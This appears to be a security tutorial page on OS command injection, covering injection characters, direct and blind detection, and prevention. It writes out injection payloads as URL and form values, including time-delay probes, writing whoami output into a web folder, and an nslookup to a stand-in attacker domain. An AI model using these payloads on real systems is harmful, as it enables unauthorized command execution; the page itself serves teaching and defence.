Os Command Injection
What is OS Command Injection?
OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.
How It Works
The attacker manipulates user input to inject malicious commands. For example:
Input is included in a backend command such as:
stockreport.pl 432 32
Malicious input like
432 & echo hello &
modifies the command:stockreport.pl 432 & echo hello & 32
This causes the shell to execute
echo hello
alongside the intended command.
Types of OS Command Injection
1. Direct Injection
The output of the injected command is visible in the application response. Example:
https://insecure-website.com/stockStatus?productID=& echo hello &
If the response includes hello
, the injection is successful.
2. Blind Injection
The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:
Timing Attacks:
Inject a time delay to observe the response time.
https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
File Writing:
Write command output to a file accessible via the web.
https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &
Out-of-Band Interaction:
Trigger DNS lookups or HTTP requests to an attacker-controlled server.
https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &
Injection Characters
The following characters can be used to inject commands:
Character
Usage
&
Execute multiple commands sequentially.
&&
Execute the next command only if the previous one succeeds.
;
Separate multiple commands.
Newline ()
Separate commands (Unix-specific).
Bash-Specific Characters:
`
(Backticks): Execute commands within the backticks.$()
(Subshell): Execute commands within the parentheses.
Examples of OS Command Injection
Exploiting GET Parameters
Echo Command Injection:
https://insecure-website.com/stockStatus?productID=& echo hello &
Timing-Based Blind Injection:
https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
Exploiting POST Parameters
Inject Commands into Form Fields:
POST /submit-form HTTP/1.1 csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing
Redirect Output:
& whoami > /var/www/static/whoami.txt &
Useful Commands for Testing
Purpose
Linux Command
Windows Command
Current user
whoami
whoami
Operating system
uname -a
ver
Network configuration
ifconfig
ipconfig /all
Open network connections
netstat -an
netstat -an
Running processes
ps -ef
tasklist
Advanced Techniques
Using Time Delays
Inject a delay to observe execution:
& sleep 10 &
Redirecting Output
Write command output to a file accessible via the web:
& whoami > /var/www/static/whoami.txt &
Out-of-Band Interaction
Trigger DNS or HTTP requests to an attacker-controlled server:
& nslookup attacker-domain.com &
How to Prevent OS Command Injection
Avoid Shell Commands:
Avoid passing user input to shell commands.
Use high-level APIs or libraries to handle tasks like file operations or process management.
Validate User Input:
Use a safelist to restrict allowed characters and commands.
Block special characters like
&
,|
,;
, and`
.
Sanitize Input:
Use escaping techniques appropriate to the shell environment.
Use Strong Permissions:
Limit the application's ability to execute shell commands or access sensitive files.
Employ Security Measures:
Use Web Application Firewalls (WAFs) to block malicious requests.
Last updated
Was this helpful?